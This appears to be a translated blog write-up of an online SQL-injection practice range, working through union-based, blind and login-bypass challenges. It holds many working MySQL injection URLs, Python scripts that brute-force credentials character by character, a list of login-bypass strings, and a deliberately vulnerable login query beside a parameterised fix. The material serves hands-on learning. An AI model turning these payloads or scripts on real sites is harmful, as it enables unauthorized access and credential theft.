MySQL Injection Basic Practice

I recently found a target range for practising SQL injection. It is fine for basic injection, without too many twists, though I seem to have misread the author's intent. Never mind, that is not important; understanding the essence of injection is what matters.



2019-04-11

指尖轻流过

I found this SQL injection range recently, had a look and did a few of the challenges, then realised my approach was not what the author had in mind. Well, it is good enough as basic practice.

Online SQL range: http://leettime.net/sqlninja.com/index.php

This starts with basic injection; more advanced syntax will follow later.

PS: it is painful to look at.

Union-based (visible) injection

Visible injection 01 (single-quote string type)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

Confirming the injection point: and '1'='1 returns normally, and '1'='2 fails. During extraction the always-false condition and '1'='2' is kept so that the original row disappears and the page displays the UNION row instead.

  • Use order by n-- - to find the number of columns

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3-- -

  • Use 1,2,3 as column placeholders to find which columns are displayed on the page

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' and '1'='2' union select 1,2,3-- -

  • Database name

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,database(),3-- -

(leettime_761wHole)

  • Use the system schema information_schema to dump the table names (the schema name is given as the hex literal 0x6C65657474696D655F37363177486F6C65 = leettime_761wHole, so no quotes are needed)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,table_name,3 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

(Username is : testtable1
Username is : userlogs
Username is : users)

  • Dump the column names (0x7573657273 = users)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,column_name,3 from information_schema.columns where table_name=0x7573657273-- -

Username is : id
Username is : username
Username is : password
Username is : user_type
Username is : sec_code

  • Dump the column contents (0x3D is the '=' separator)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,concat(username,0x3D,password),3 from users-- -

Username is : injector=khan
Username is : decompiler=hacktract
Username is : devilhunte=dante
Username is : Zen=sec-idiots
Username is : Zenodermus=security-i
Username is : grayhat=hacker
Username is : khan=haxor
Username is : admin=sadmin
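The six steps above are the whole union-based procedure: count the columns with ORDER BY, find a displayed column, then point that column at database(), information_schema.tables, information_schema.columns and finally the target table. The following is an added example, not code from the page or from the leettime range, that writes those steps as reusable Python helpers and runs them against a constructed stand-in for basic_ch1.php (mock_fetch, an assumption that only understands the payload shapes built here; the 'Unknown column' and 'Username is : ' strings are taken from the page's output). To use it against a real page, replace mock_fetch with a function that performs the GET and returns the body.

```python
import re
from typing import Callable, List

Fetch = Callable[[str], str]  # value of the id parameter -> response body


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL hex literal so it can appear in a query
    without quotes: hex_literal('users') == '0x7573657273'."""
    return "0x" + s.encode().hex().upper()


def parse_rows(body: str) -> List[str]:
    """Collect the values the challenge page echoes as 'Username is : X'."""
    return re.findall(r"Username is : (.+)", body)


def find_column_count(fetch: Fetch, quote: str = "'", max_cols: int = 20) -> int:
    """ORDER BY n is accepted while n <= number of selected columns and
    raises 'Unknown column' beyond it; the last accepted n is the count."""
    for n in range(1, max_cols + 1):
        if "Unknown column" in fetch(f"1{quote} order by {n}-- -"):
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def union_payload(expr: str, cols: int, pos: int, quote: str = "'", tail: str = "") -> str:
    """Build  1' and '1'='2' union select 1,<expr>,3 <tail>-- -
    The always-false condition empties the original result set, so the
    UNION row is what lands in displayed column `pos`."""
    fields = [str(i) for i in range(1, cols + 1)]
    fields[pos - 1] = expr
    return f"1{quote} and {quote}1{quote}={quote}2{quote} union select {','.join(fields)}{tail}-- -"


def dump_database(fetch: Fetch, cols: int, pos: int) -> str:
    rows = parse_rows(fetch(union_payload("database()", cols, pos)))
    return rows[0] if rows else ""


def dump_tables(fetch: Fetch, cols: int, pos: int, schema: str) -> List[str]:
    tail = f" from information_schema.tables where table_schema={hex_literal(schema)}"
    return parse_rows(fetch(union_payload("table_name", cols, pos, tail=tail)))


# --- constructed stand-in for basic_ch1.php (assumption: it only simulates the
# three payload shapes used above, not the real PHP) ---------------------------
MOCK_SCHEMA = "leettime_761wHole"
MOCK_TABLES = {MOCK_SCHEMA: ["testtable1", "userlogs", "users"]}
MOCK_COLS = 3
HEX_RE = re.compile(r"0x([0-9A-Fa-f]+)")


def mock_fetch(id_param: str) -> str:
    m = re.search(r"order by (\d+)", id_param)
    if m:
        n = int(m.group(1))
        return "Username is : injector" if n <= MOCK_COLS else f"Unknown column '{n}' in 'order clause'"
    m = re.search(r"union select (.*?)(?: from (.*?))?-- -$", id_param)
    if not m:
        return "Username is : injector"  # untouched query: the original row
    fields, src = m.group(1).split(","), m.group(2) or ""
    if len(fields) != MOCK_COLS:
        return "The used SELECT statements have a different number of columns"
    if "database()" in fields:
        return "Username is : " + MOCK_SCHEMA
    if "table_name" in fields and "information_schema.tables" in src:
        h = HEX_RE.search(src)
        schema = bytes.fromhex(h.group(1)).decode() if h else ""
        return "\n".join("Username is : " + t for t in MOCK_TABLES.get(schema, []))
    return ""


if __name__ == "__main__":
    cols = find_column_count(mock_fetch)          # 3
    db = dump_database(mock_fetch, cols, pos=2)   # leettime_761wHole
    print(cols, db, dump_tables(mock_fetch, cols, 2, db))
```

The hex literal matters beyond convenience: because it carries no quote characters it survives addslashes-style filtering, which is why the page uses 0x... for every string literal in its information_schema queries.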

Visible injection 02 (integer type)

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1

Confirming the injection point: and 1=1 returns normally, and 1=2 fails. During extraction and 1=2 is kept so the page shows the UNION row.

  • Confirm the number of columns

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 order by 4-- -

  • Confirm the displayed columns

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,database(),3,4-- -

  • Dump the table names

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

  • Dump the column names

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273-- -

  • Column contents (note the space before union; 1=2union is a syntax error)

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,concat(username,0x3D,password),3,4 from users-- -

Visible injection 03 (double-quote string type)

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1

Confirming the injection point: and "1"="1 returns normally, and "1"="2 fails. During extraction and "1"="2" is kept so the page shows the UNION row.

  • Find the number of columns

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" order by 5-- -

  • Positions of the displayed columns

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,2,3,4,5-- -

  • Database name

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,database(),3,4,5-- -

  • Table names

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

  • Column names

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x7573657273-- -

  • Column contents

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,concat(username,0x3D,password),3,4,5 from users-- -

Visible injection 04 (string + parenthesis)

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1

Confirming the injection point

?id=1' errors with use near ''1'')' at line 1, so the value is wrapped in ('...') and the payload is built as ?id=1') and 1=2

The extraction steps are omitted; they follow visible injection 01 with ') as the closing sequence.

Visible injection 05 (limit restriction)

http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1

Confirming the injection point:

Appending a single quote, ?id=1', errors with use near '' and id=1' limit 1' at line 1

and 1=1 returns normally, and 1=2 fails, which proves the injection exists; but because of the limit only one row comes back per request.

  • Dump the column count,

...

  • Use limit to dump the table names one row at a time

http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1 and 1=2 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 2,1-- -

  • Use limit to dump the column names one row at a time

http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1 and 1=2 union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x7573657273 limit 2,1-- -

  • Use limit to output the column contents one row at a time

http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1 and 1=2 union select 1,concat(username,0x3D,password),3,4,5 from users limit 1,1-- -

Blind injection

Blind injection 01 (numeric)

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1

Confirming the injection point:

and 1=1 returns normally, and 1=2 fails, so an injection point exists;

order by 3-- - errors with: order by 3-- -)) and id='1 order by 3-- -' limit 1. The error shows the parameter substituted twice, once unquoted inside (( )) and once quoted, so a -- - comment also removes the closing parentheses the query still needs.

PS: the challenge is labelled XPATH, but I could not get a statement to work for a long time; in the end it turned out to be a blind injection, and the only form that works is ?id=1 and 1=1 and if(xxx,xxx,xxx)

  • Determine the length of the database name; use > to narrow the range quickly. It is 17.

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and if(length(database())>15,sleep(3),1)

  • Test the database name one character at a time (101 is 'e', the second character of leettime_761wHole); a long name makes this slow

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and ascii(substr(database(),2,1))= 101

import requests

# Boolean-based blind: the page contains "this id exists" only when the
# injected condition is true. Walk the 17 positions of database() (length
# found above) and try every candidate character; only ord(p) goes into the
# URL, so the charset itself never needs escaping.
url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678QWERTYUIOPALKJHGFDZXCVBNM90!@#$%^&*()_+/\\":;\'*?><,.~`'
name = ''
for i in range(1, 18):
    for p in st:
        get_url = url + ' and 1=1 and ascii(substr(database(),{0},1))={1}'.format(i, ord(p))
        res = requests.get(get_url)
        if 'this id exists' in res.text:
            name += p
            print(p)
            break  # character at this position found; move on to the next
print(name)
  • Determine the tables: first use count to get their number. ASCII 51 is the character 3, so there are three tables.

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and ascii(substr((select count(table_name) from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65),1,1))=51

  • Determine the length of each table name, using limit to select them one at a time (the first is 10 characters)

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and length((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 0,1))=10

  • Determine the table names

and 1=1 and ascii(substr((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 0,1),1,1))>100

import requests

url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678'  # lowercase and digits cover testtable1 / userlogs / users
# Table names: three tables (count found above), each selected with limit i,1
# and read one character at a time up to the 10-character maximum.
for i in range(3):
    print('table', i + 1)
    name = ''
    for x in range(1, 11):  # position in the name
        for p in st:
            get_url = url + ' and 1=1 and  ascii(substr((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit {0},1),{1},1))={2}'.format(i, x, ord(p))
            # print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                name += p
                print(p)
                break
        else:
            break  # no candidate matched: past the end of the name
    print(name)
  • Determine the number of columns: 5 (ASCII 53 is the character 5)

and 1=1 and ascii(substr((select count(column_name) from information_schema.columns where table_name=0x7573657273),1,1))=53

  • Determine the column name length (the first, id, is 2)

and 1=1 and length((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1))=2

  • Determine the column names (105 is 'i')

and 1=1 and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))=105

import requests

url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678_'  # '_' added: user_type and sec_code contain it
# Column names of users: five columns (count found above), limit i,1 picks each one.
for i in range(5):
    print('column', i + 1)
    name = ''
    for x in range(1, 11):  # position in the name
        for p in st:
            get_url = url + ' and 1=1 and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit {0},1),{1},1))={2}'.format(i, x, ord(p))
            # print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                name += p
                print(p)
                break
        else:
            break  # no candidate matched: past the end of the name
    print(name)
  • Length of the value (injector=khan is 13 characters)

and 1=1 and length((select concat(username,0x3D,password) from users limit 0,1))=13

  • The value itself

and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

import requests

url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678=-'  # '=' (0x3D separator) and '-' (sec-idiots) added
# username=password pairs from users: the first three rows, limit i,1 each.
for i in range(3):
    print('row', i + 1)
    value = ''
    for x in range(1, 26):  # maximum length of a username=password value
        for p in st:
            get_url = url + ' and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit {0},1),{1},1))={2}'.format(i, x, ord(p))
            # print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                value += p
                print(p)
                break
        else:
            break  # no candidate matched: past the end of the value
    print(value)

Blind injection 02 (numeric / parentheses)

A simplified version of blind injection 01

http://leettime.net/sqlninja.com/tasks/xpath_ch2.php?id=1

and 1=1 returns normally, and 1=2 fails, so an injection point exists;

Sending a single quote first errors with use near '') limit 1' at line 1, from which the query can be inferred to be where id=(1)

It should be written like this:

1) and 1=(1) and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

or like this:

and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

Blind injection 03

http://leettime.net/sqlninja.com/tasks/xpath_ch3.php?id=1

Sending the test string 'with first errors with use near '' with and 1' with limit 1' at line 1

My guess at the statement: where id=$a and $a limit 1; after inserting the data it becomes where id=1 and 1=1 and 1 and 1=1 limit 1

So the following statement is constructed and executes successfully:

and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

or:

1 and 1=(1) and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Minor issue: order by reveals the column count, but it cannot be taken any further.

http://leettime.net/sqlninja.com/tasks/xpath_ch3.php?id=1 and 1=1 order by 6-- -

Blind injection 04 (double quote)

http://leettime.net/sqlninja.com/tasks/xpath_ch4.php?id=1

Adding the character ' first returns normally; testing a double quote next returns use near '1"" limit 1' at line 1

Using " and "1"="1 returns normally and " and "1"="2 fails, confirming the injection point

Usable:

?id=1" and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

or:

?id=1" and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Blind injection 05

http://leettime.net/sqlninja.com/tasks/sub_ch1.php?id=1

Sending a double quote errors with use near '") limit 1' at line 1

Trying and ('1')=('1') returns normally, and ('1')=('2') fails

Hmm......

Usable statements:

and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

?id=1 and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

Blind injection 06 (double quote + parenthesis)

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1

Sending a double quote " first errors with use near '"1"") limit 1' at line 1, so the query wraps the value as ?id=("$a")

?id=1") and ("1")=("1")-- - returns normally, ?id=1") and ("1")=("2")-- - fails

Usable statement:

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") and ("1")=("1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Running the following statement (note the misspelt function name scii) produces an error that reveals the current database user and the database name:

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Error While Selection process : execute command denied to user 'tr0ubl3createrha'@'localhost' for routine 'leettime_761wHole.scii'

Further testing:

order by works: http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") order by 5-- -

And that is as far as it goes; union select does not work here.

Blind injection 06 (single quote + parenthesis)

http://leettime.net/sqlninja.com/tasks/sub_ch3.php?id=1

First, sending a single quote errors with use near '1'' limit 1' at line 1

Next, and 1=1 and and 1=2 both return normally; closing the quote, ' and '1'='1 returns normally and ' and '1'='2 fails

However, the following statement errors:

?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Trying ?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 errors with use near '') and id='1' and '1'='1' and scii(substr((select concat(username,0x3D,password)' at line 1, proving that the value sits inside parentheses and they need to be closed.

Usable statement:

http://leettime.net/sqlninja.com/tasks/sub_ch3.php?id=1') and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Another statement that errors: ?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))='105, with the error: Error While Selection process : execute command denied to user 'tr0ubl3createrha'@'localhost' for routine 'leettime_761wHole.scii'

Blind injection 07 (single quote + parenthesis + fixed position)

http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1

Appending characters first, ?id=1'ccc, errors with use near 'ccc'))a limit 1' at line 1, so the value is followed by '))

Testing: ?id=1') and ('1')=('1 returns normally, ?id=1') and ('1')=('2 fails. Trying ?id=1') and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 does not work and errors with use near ''))a limit 1' at line 1, because the application's trailing quote and parentheses are left unclosed. So the condition is moved in front of the closing fragment instead.

Usable statement:

?id=1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and ('1')=('1

Blind injection 08 (single quote + fixed position)

http://leettime.net/sqlninja.com/tasks/blind_ch1.php?id=1

Testing single quotes, double quotes, parentheses and so on produced no reaction. Using and 1=1 directly did not work either; closing with a single quote does:

' and '1'='1 succeeds, ' and '1'='2 fails, proving the injection exists. But ' and '1'='1' and xxxx does not execute, even with a comment appended. So the condition is moved in front of the closing fragment.

Usable statement:

http://leettime.net/sqlninja.com/tasks/blind_ch1.php?id=1' and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and '1'='1
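Blind injection 07 and 08 both end the same way: the -- - comment fails and the condition has to sit between the opening fragment and a trailing '1')=('1 that the application's own quote and parentheses complete. The following is an added example, not code from the page, that makes the reason visible. It splices both payload styles into reconstructed query templates and runs a small quote/parenthesis balance check over the result (after dropping a -- comment), so you can see which payload leaves parsable SQL. The templates are assumptions inferred from the error text on the page (sub_ch4 from 'ccc'))a limit 1, blind_ch4 from the ("...") shape), not the challenge's real PHP, and the checker deliberately ignores backslash escapes, which none of the page's payloads use.

```python
def render(template: str, value: str) -> str:
    """Splice the attacker-controlled id into the application's query text.
    '$id' marks where the PHP string interpolation happens (assumption)."""
    return template.replace("$id", value)


def strip_comment(sql: str) -> str:
    """Drop everything after a MySQL '-- ' comment (the page writes it as '-- -')."""
    i = sql.find("-- ")
    return sql if i < 0 else sql[:i]


def is_balanced(sql: str) -> bool:
    """True when every string literal is closed and parentheses balance outside
    literals. Backslash-escaped quotes are not handled (not needed here)."""
    sql = strip_comment(sql)
    depth, quote = 0, None
    for ch in sql:
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return quote is None and depth == 0


def comment_payload(cond: str, quote: str = "'", parens: int = 0) -> str:
    """Close the value, append the condition, comment out the rest:
    1') and ('1')=('1') and <cond>-- -"""
    close, open_ = quote + ")" * parens, "(" * parens + quote
    return f"1{close} and {open_}1{close}={open_}1{close} and {cond}-- -"


def fixed_position_payload(cond: str, quote: str = "'", parens: int = 0) -> str:
    """Put the condition in the middle and let the application's own trailing
    quote/parentheses close the last literal:  1') and <cond> and ('1')=('1"""
    close, open_ = quote + ")" * parens, "(" * parens + quote
    return f"1{close} and {cond} and {open_}1{close}={open_}1"


# Query shapes reconstructed from the page's error messages (assumptions):
TEMPLATES = {
    # blind 07 / sub_ch4: error "near 'ccc'))a limit 1'" -> derived table with alias a
    "sub_ch4": "select * from (select username from users where id=('$id'))a limit 1",
    # blind 11 / blind_ch4: double quote + one parenthesis, nothing the query needs after it
    "blind_ch4": 'select username from users where id=("$id") limit 1',
}
COND = "ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105"


def which_payloads_parse(template: str, quote: str, parens: int) -> dict:
    """Render both payload styles into the template and report which survive
    the balance check. Returns {'comment': bool, 'fixed': bool}."""
    return {
        "comment": is_balanced(render(template, comment_payload(COND, quote, parens))),
        "fixed": is_balanced(render(template, fixed_position_payload(COND, quote, parens))),
    }


if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        q, p = ("'", 1) if name == "sub_ch4" else ('"', 1)
        print(name, which_payloads_parse(tpl, q, p))
```

With the sub_ch4 template the comment payload leaves the outer ( of the derived table unclosed, which is the same syntax error the page reports; the fixed-position payload reads where id=('1') and ... and ('1')=('1'))a limit 1 and parses. With the blind_ch4 template both styles parse, matching the page's blind injection 11 where -- - does work.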

Blind injection 09 (same as blind injection 08)

http://leettime.net/sqlninja.com/tasks/blind_ch2.php?id=1

Blind injection 10 (same as the numeric blind injection)

http://leettime.net/sqlninja.com/tasks/blind_ch3.php?id=1

Blind injection 11 (double quote + parenthesis)

Usable statements:

http://leettime.net/sqlninja.com/tasks/blind_ch4.php?id=1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and 1=("1

http://leettime.net/sqlninja.com/tasks/blind_ch4.php?id=1") and 1=("1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Blind injection 12 (double quote + parenthesis + fixed position)

http://leettime.net/sqlninja.com/tasks/blind_ch5.php?id=1

Usable statement:

http://leettime.net/sqlninja.com/tasks/blind_ch5.php?id=1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and 1=("1

Universal passwords (login bypass)

http://leettime.net/sqlninja.com/tasks/login_basic_ch1.php

') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"

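Each entry in the list above assumes a particular way the login query quotes its values: the ') family closes a parenthesised single-quoted literal, the " family a double-quoted one, and the or ... forms either comment out the password check or turn the whole WHERE clause true. The following is an added example, not code from the page, that shows one of those shapes end to end: a string-built login query in the ('...') form, the same query with bound parameters, and a constructed two-row users table (names taken from the page's dump). It uses Python's built-in SQLite instead of MySQL, so the -- comment and the ('')=('') trick behave as on the page, but the arithmetic variants such as '-' and '*' rely on MySQL comparing a string to a number and are not reproduced here.

```python
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the challenge's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer primary key, username text, password text)")
    con.executemany("insert into users(username, password) values (?, ?)",
                    [("admin", "sadmin"), ("injector", "khan")])
    return con


def vulnerable_login(con: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    """Query built by string formatting, in the parenthesised single-quote
    shape the ') payload family targets (assumed shape of login_basic_ch1.php).
    Returns the username of the first matching row, so an attacker who makes
    the WHERE clause true is logged in as whoever sorts first, here admin."""
    sql = f"select username from users where username=('{user}') and password=('{pw}')"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(con: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    """Same query with bound parameters: the payload is compared as data, so
    ') or 1-- is simply a username nobody has."""
    sql = "select username from users where username=(?) and password=(?)"
    row = con.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def try_bypasses(con: sqlite3.Connection, payloads: List[str]) -> List[str]:
    """Return the payloads that log in through the vulnerable query when sent
    as both username and password, the way a login form would be fuzzed."""
    return [p for p in payloads if vulnerable_login(con, p, p) is not None]


if __name__ == "__main__":
    db = make_db()
    for p in ["') or 1--", "') or ('')=('", "nope"]:
        print(repr(p), vulnerable_login(db, p, p), safe_login(db, p, p))
```

With ') or 1-- the query becomes where username=('') or 1--') and password=('...'), and the password check is gone; with ') or ('')=(' as the password the clause ends in or ('')=('') and AND/OR precedence makes the whole condition true. The parameterised version returns None for both because the quotes and parentheses never reach the SQL parser.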
All original articles are licensed under the Creative Commons Attribution-NonCommercial 4.0 International licence.
You are free to repost and modify them, but please credit the source and do not use them commercially.
Some content on this site is collected from the internet; if anything infringes or is inappropriate, please contact us to have it removed.
